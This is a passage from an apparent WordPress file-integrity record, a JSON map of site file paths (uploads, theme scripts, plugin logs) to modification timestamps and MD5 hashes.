24544,\"h\":\"230734128976b7a5d930ad89aab12983\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2013\\/10\\/lgztamiasreport3-17-12.xls\":{\"d\":1382624344,\"h\":\"3be2bde9f5e9b7e828ec388eee424521\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2013\\/10\\/lgz-tamias-report-operating-acct-feb-19-2013.pdf\":{\"d\":1382624070,\"h\":\"fbe13274dc0ad1077e4f5947a5d749b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2016\\/12\\/LGZPressRelease.pdf\":{\"d\":1481741757,\"h\":\"af7f0ac27b65ca942d8a97c3ea3e1bdf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/09\\/AACR-Education-Forum-2015-flyer.pdf\":{\"d\":1442748004,\"h\":\"3d31efbbd3e38ee81461ae681ee9d0eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/11\\/3RD-Annual-Denim-and-Pearlz_Flyer_2.pdf\":{\"d\":1448843027,\"h\":\"2cd2dd95d49875c3ace12ab7cd34aec1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/Final2017HSApplication.docx\":{\"d\":1476733627,\"h\":\"b6e606eed5309d62f19a46cbe3bdaeb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/ElectronicHCCStudentScholarship.docx\":{\"d\":1443109872,\"h\":\"eb272a9ef153225a6bd5289e65f8cc57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/FinalHCCC-2016-Scholarship-Application-Package-2.docx\":{\"d\":1443404388,\"h\":\"476f7e023515b420416a57cdf3ea862d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/FinalElectronicHigh-School-Students-Scholarship-2.docx\":{\"d\":1443404341,\"h\":\"eef2237c8b4401a9eec5dbea61dbaf4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/FinalHCCC-2016-Scholarship-Application-Package-21.docx\":{\"d\":1443410573,\"h\":\"59ccc7e20b72bd90421cc810d5691dab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/Final2017HCCCApplication.docx\":{\"d\":1476733599,\"h\":\"a6e980094eb887cd5e3b862ab1dc6ebb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/ElectronicHigh-School-Students-Scholarship.docx\":{\"d\":1443109506,\"h\":\"bb3419fd184fd5e05f180d09b8cda871\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/2015\\/05\\/Recommendation-Form.docx\":{\"d\":1443109940,\"h\":\"26c308138f3d05cebef498aac6b95ea0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/ithemes-security\\/logs\\/index.php\":{\"d\":1508602094,\"h\":\"a605acf2b02df4876305872b2c14a29b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/ithemes-security\\/index.php\":{\"d\":1515452313,\"h\":\"a605acf2b02df4876305872b2c14a29b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/GeoIPv6.dat\":{\"d\":1528158719,\"h\":\"e6dce95c96743705be616ad76e37e970\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/GeoLite2-Country.mmdb\":{\"d\":1533255395,\"h\":\"b42124afc2a8ac17c0eec7739b32aba9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/uploads\\/GeoIP.dat\":{\"d\":1528158719,\"h\":\"8ef41798df108ce9bd41382c9721b1c9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.hoverintent.min.js\":{\"d\":1480435692,\"h\":\"b4cfa1d07f60eebd4746a3941196bd67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/sly.min.js\":{\"d\":1480435692,\"h\":\"1e03dbf33122de04d440338b1c4683f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/paypal-button.min.js\":{\"d\":1480435692,\"h\":\"065ed0ec7d7066d2d3d22447589b4cf3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/layout-builder.js\":{\"d\":1480435692,\"h\":\"8e38ed7fd910cbf27368a3c473dab30f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.bxslider.min.js\":{\"d\":1480435692,\"h\":\"697d69a48e5356f7106e38c09f7f19e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/handlebars.js\":{\"d\":1480435692,\"h\":\"de04650098775c2f59183dfde4512583\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/modernizr.custom2.js\":{\"d\":1480435692,\"h\":\"1de5419fea2749e57b75d17d89b0f6c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.mCustomScrollbar.concat.min.js\":{\"d\":1480435692,\"h\":\"5b1c9b5f2fbd488061227fc9067c57e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.slicebox.js\":{\"d\":1480435692,\"h\":\"76f8c88ed96ad036fe92fa2944b3cd55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/echo.js\":{\"d\":1480435692,\"h\":\"6b09519eb1162ea798a8ac8d76cc7a2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.scrollTo-min.js\":{\"d\":1480435692,\"h\":\"50d20987b4b0d60678bfc82cea466cfb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/bootstrap.min.js\":{\"d\":1480435692,\"h\":\"ba847811448ef90d98d272aeccef2a95\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/parallax.slider.js\":{\"d\":1480435692,\"h\":\"4cdfdc1df0f0901b616fa43cde9ffb56\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.isotope.min.js\":{\"d\":1480435692,\"h\":\"4a328a943d6b6423926b6c7d56616c49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/html5.js\":{\"d\":1480435692,\"h\":\"0ce8f355891c26c28f057e195e97dcd5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.min.js\":{\"d\":1480435692,\"h\":\"b8d64d0bc142b3f670cc0611b0aebcae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.dlmenu.js\":{\"d\":1480435692,\"h\":\"631e96de0fc88f972f86c6ae225e6b22\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/modernizr.custom.js\":{\"d\":1480435692,\"h\":\"3ad7bc528408307bbba6f4c01a1ca04d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.easing.1.3.js\":{\"d\":1480435692,\"h\":\"6516449ed5089677ed3d7e2f11fc8942\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.tools.min.js\":{\"d\":1480435692,\"h\":\"2dbda6a6aaf07cab49c5a54af5e83cbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.easypiechart.min.js\":{\"d\":1480435692,\"h\":\"d2e1eadb5379ef5cfef1135d558bc140\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/Chart.min.js\":{\"d\":1480435692,\"h\":\"c0c163df68a54309802d8792f10329f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/colorpicker.js\":{\"d\":1480435692,\"h\":\"87bd30f8c0fd2dbbe7fe89b7fb198227\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.flexslider-min.js\":{\"d\":1480435692,\"h\":\"9ec3c315b67f434aabc4da58eabc6c3a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.prettyphoto.js\":{\"d\":1480435692,\"h\":\"f81c3c778084503cad39095830c6b3f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/jquery.cookie.js\":{\"d\":1480435692,\"h\":\"d5528dde0006c78be04817327c2f9b6f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/js\\/scripting.js\":{\"d\":1480435692,\"h\":\"8dfc30075a35c02031f5a35b814ef912\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/single-product\\/product-image.php\":{\"d\":1480435692,\"h\":\"3a590d7f778fe7b28565990c8d3bb094\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/single-product\\/product-thumbnails.php\":{\"d\":1480435692,\"h\":\"b9001bae16acac8845bc3cdd49467f34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/loop\\/loop-end.php\":{\"d\":1480435692,\"h\":\"ee6ade878fd963537ea4f4e24d30f68a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/loop\\/loop-start.php\":{\"d\":1480435692,\"h\":\"e876abd905342ec59b6f07527958cdc6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/content-product.php\":{\"d\":1480435692,\"h\":\"a04d98470a1da758cb32bd160c204fbc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/single-product.php\":{\"d\":1480435692,\"h\":\"13df9835c8fb32c9af16f223001e5866\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/archive-product.php\":{\"d\":1480435692,\"h\":\"41dbefb618c83edbf79e3812b0b4eb44\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/loop-shop.php\":{\"d\":1480435692,\"h\":\"b0489b537dcd6444905d4e023d7bdc42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/woocommerce\\/theme-woocommerce.php\":{\"d\":1480435692,\"h\":\"3f71b4e5cac05b8783047ef76b07b633\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/import-data\\/import.txt\":{\"d\":1480435692,\"h\":\"be1d58fc071956291da4cb061a5348e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/twitter\\/twitteroauth\\/OAuth.php\":{\"d\":1480435692,\"h\":\"76fc12792d4c2a4fb43fde7a22c26750\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/twitter\\/twitteroauth\\/twitteroauth.php\":{\"d\":1480435692,\"h\":\"c329e25121783a292524acaea23bb28d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/most-liked.php\":{\"d\":1480435692,\"h\":\"7f99c6f10fc8ccd90c49a5241d4f3449\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/list-events.php\":{\"d\":1480435692,\"h\":\"71bdf1b41dd547650faa14bb7624e1ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/tags.php\":{\"d\":1480435692,\"h\":\"8a03431b71557f5be813c32267c6b1da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/comments.php\":{\"d\":1480435692,\"h\":\"f5778e88e8b89262ace7d9f8db8ba034\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/flickr.php\":{\"d\":1480435692,\"h\":\"e3c888e1f9b0018f1ed7b727a20b19de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/custom_post.php\":{\"d\":1480435692,\"h\":\"98ffdcfc76416d181b884455d2c904e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/tweets.php\":{\"d\":1480435692,\"h\":\"d82ffb49879e8954130e710d9a4ce40a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/instagram.php\":{\"d\":1480435692,\"h\":\"6e5359392be2c66c982d76a544bc99ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/facebook.php\":{\"d\":1480435692,\"h\":\"c50aac0ba2dfff48c4eecaeba656d2be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/most-viewed.php\":{\"d\":1480435692,\"h\":\"c374a2b549197e0e24fbc68a48380272\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/TwitterAPIExchange.php\":{\"d\":1480435692,\"h\":\"a66de8c8626b015b418448a811eee727\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/latest_posts.php\":{\"d\":1480435692,\"h\":\"58ddfef35310c5ed743c29bf1573347d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets\\/tweets.hopeful.php\":{\"d\":1480435692,\"h\":\"04eab306754cd7f9a608e5b4bc103094\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/classes\\/template.php\":{\"d\":1480435692,\"h\":\"c77474a835358b9a3889bdba8ac3dbb6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/classes\\/element.php\":{\"d\":1480435692,\"h\":\"b7b9fc1bf118e49107011a56b32dc447\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/ribbon.php\":{\"d\":1480435692,\"h\":\"8a3aec56baac4e8b9667d31815945d5a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/feature.php\":{\"d\":1480435692,\"h\":\"da40694f353af4700a6ad27e7270ff33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/list-view.php\":{\"d\":1480435692,\"h\":\"af9e1fcf49d16db78d2c265fb943e099\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/grid-view.php\":{\"d\":1480435692,\"h\":\"3d346406c1ec208336b07a9e8446869e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/mosaic-view.php\":{\"d\":1480435692,\"h\":\"dec4efc0b1e8508d9a0de4ee9ccbab39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/timeline-features.php\":{\"d\":1480435692,\"h\":\"878dc2ee04a6f6e5a75a7523e92e3bbe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/contact-form.php\":{\"d\":1480435692,\"h\":\"8b90ed8d936ca15794728a6ff058178f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/count-down.php\":{\"d\":1480435692,\"h\":\"9a6238a56f46172fd8f27933fd46e5fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/callaction.php\":{\"d\":1480435692,\"h\":\"76ce9716d445f1395cd8008b1e4b91d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/events.php\":{\"d\":1480435692,\"h\":\"5347659fc8613f8c304c5e20b070e947\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/featured-area.php\":{\"d\":1480435692,\"h\":\"c3b5eb48d2e1802544d60b8591ec6fd4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/causes-view.php\":{\"d\":1480435692,\"h\":\"60e1617fdfd86bcd8b32e56701289537\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/cause-featured.php\":{\"d\":1480435692,\"h\":\"de03597984619c140fa8a873fb4cc58f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/timeline-view.php\":{\"d\":1480435692,\"h\":\"ec7b7448024919e852a93adc18237001\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/listed-feature.php\":{\"d\":1480435692,\"h\":\"d8687a9b53e431620ae5f77842346e57\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/team.php\":{\"d\":1480435692,\"h\":\"1d2e98b1f030a10130162b0febace519\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/super-posts.php\":{\"d\":1480435692,\"h\":\"443e68a5e96bed83f226c8ef4ce7c915\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/pricing-tables.php\":{\"d\":1480435692,\"h\":\"0c0b2074aabdb0be6d5765fc6590e35c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/accordion.php\":{\"d\":1480435692,\"h\":\"eb571026816a109a58ef5f1eb227bb8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/big-posts.php\":{\"d\":1480435692,\"h\":\"aea3ec5200412f517680e1d6f809694a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/thumbs-view.php\":{\"d\":1480435692,\"h\":\"132689c06ad0253d9b90adc4fde39825\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/templates\\/image-carousel.php\":{\"d\":1480435692,\"h\":\"d15a7b8a50b1602c1887c5dc2ecffb69\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/templates\\/edit.php\":{\"d\":1480435692,\"h\":\"935fab7588ba59e65f38684560657809\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/templates\\/create.php\":{\"d\":1480435692,\"h\":\"7433daa7fefcae3f416161561bc36e5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/templates\\/templates.php\":{\"d\":1480435692,\"h\":\"9f41849cdc1ae4fae5bfaac26faf6911\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/elements\\/header-footer.php\":{\"d\":1480435692,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/elements\\/content.php\":{\"d\":1480435692,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/elements\\/edit-template-row.php\":{\"d\":1480435692,\"h\":\"d70a307641a25e4b0ca8dbadae1c55a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-builder\\/views\\/elements\\/elements-editor.php\":{\"d\":1480435692,\"h\":\"835fcd927658b1d76415388862b9bcf8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/ts-shortcode\\/ts-shortcode-tinymce-button.js\":{\"d\":1480435692,\"h\":\"72c0a6504fb408d04ca0a3d902a5cd5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/ts-shortcode\\/TsShortcode.php\":{\"d\":1480435692,\"h\":\"6714dc1401002850a755ef2f0a2b04df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/megamenu\\/class-megamenu.php\":{\"d\":1480435692,\"h\":\"9aaf93faece3f451d5935cd3160eb1ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/megamenu\\/ts-megamenu.php\":{\"d\":1480435692,\"h\":\"609debcd5e60ba733d5223c41447fc77\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/envato-wp-theme-updater.php\":{\"d\":1480435692,\"h\":\"468ed8a4ecebf20f736dd4bc93a0482b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/class-envato-protected-api.php\":{\"d\":1480435692,\"h\":\"ec4551db71280570716339056a915831\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/TouchSizeLikes.php\":{\"d\":1480435692,\"h\":\"808a2a4f7a096c99bb60582a2018afcc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/widgets.php\":{\"d\":1480435692,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/layout-compilator.php\":{\"d\":1480435692,\"h\":\"fb0f8c924f1728a4ce19f16c151cf505\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/dynamic-css-and-js.php\":{\"d\":1480435692,\"h\":\"9e9858edde82365f11974862bf8a0647\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/custom-posts.php\":{\"d\":1480435692,\"h\":\"720e84828c78710ddf7db4da0c1e7116\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/functions.php\":{\"d\":1480435692,\"h\":\"382ac8f8d31ea02fa775264fb7c5ee2d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/attached_images_manager.php\":{\"d\":1480435692,\"h\":\"83a71050e3ca0d003806ec1e6571183d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/options.php\":{\"d\":1480435692,\"h\":\"ab3cd42f3d7b6f6078a43b42d5425c29\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/aq_resizer.php\":{\"d\":1480435692,\"h\":\"2e2f4c44eb5e28b2bd70f111ae4cfc39\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/fields.class.php\":{\"d\":1480435692,\"h\":\"df54b3f5217257ab2c0bf2d3cdff7dee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/patterns.php\":{\"d\":1480435692,\"h\":\"49b94080a93eb60ba144f8839ecb8a0e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/dynamic-sidebars.php\":{\"d\":1480435692,\"h\":\"861ca1804f479b75a5559798bde9acf6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/include-to-search.php\":{\"d\":1480435692,\"h\":\"d3e3b4c69f5385de59e8402d1a7a7f81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/theme-setup.php\":{\"d\":1480435692,\"h\":\"ead95bb4dbde03406cfd4b1cea97acc8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/includes\\/ajax.php\":{\"d\":1480435692,\"h\":\"29da6f76eb7aacfa552509a912399d16\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/languages\\/how-to-translate.txt\":{\"d\":1480435692,\"h\":\"e34c9175c9e402b19ade4296718fad9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/themes\\/default.js\":{\"d\":1480435692,\"h\":\"f3d6a893430dec9ae42de1570c27eb84\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/bottomRight.js\":{\"d\":1480435692,\"h\":\"db049fc31d2adf18c71f17c8e819c0f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/topLeft.js\":{\"d\":1480435692,\"h\":\"9c2eb7bc67792c59be35cc9ee19426b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/topCenter.js\":{\"d\":1480435692,\"h\":\"ed897179e2687a7864f12f84142e8620\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/center.js\":{\"d\":1480435692,\"h\":\"99e10668ce184df3d00c7105f7e49c0b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/bottomCenter.js\":{\"d\":1480435692,\"h\":\"ac207cc1fd4aeb8eaa7d5907be53966a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/inline.js\":{\"d\":1480435692,\"h\":\"1b3be192cb0426192cc91bda43c58384\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/centerLeft.js\":{\"d\":1480435692,\"h\":\"ccb515b60253d97c2165183461487fa0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/centerRight.js\":{\"d\":1480435692,\"h\":\"f692c35777986920d09b4988357dd807\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/bottom.js\":{\"d\":1480435692,\"h\":\"4cab8e24ddc0aeedbdcee0ad10202a8a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/top.js\":{\"d\":1480435692,\"h\":\"d54cd99dd6fc78ce8b9dac0aaee884d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/bottomLeft.js\":{\"d\":1480435692,\"h\":\"2461571e806d99c88794b4fb79e141e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/layouts\\/topRight.js\":{\"d\":1480435692,\"h\":\"a1195dab017132a156830bc3b5afa909\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/LICENSE.txt\":{\"d\":1480435692,\"h\":\"e049e8717c06799889b27a45824347c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/promise.js\":{\"d\":1480435692,\"h\":\"ce71213b86bf3221433c99d2ff7f5219\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/README.markdown\":{\"d\":1480435692,\"h\":\"dd8237990694bf3eb407add4d9c95732\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/themes\\/hopeful\\/admin\\/js\\/noty\\/jquery.noty.js\":{\"d\":1480435692,\"h\":\"fdf3a082d88628f8193351adc8112453\"},\"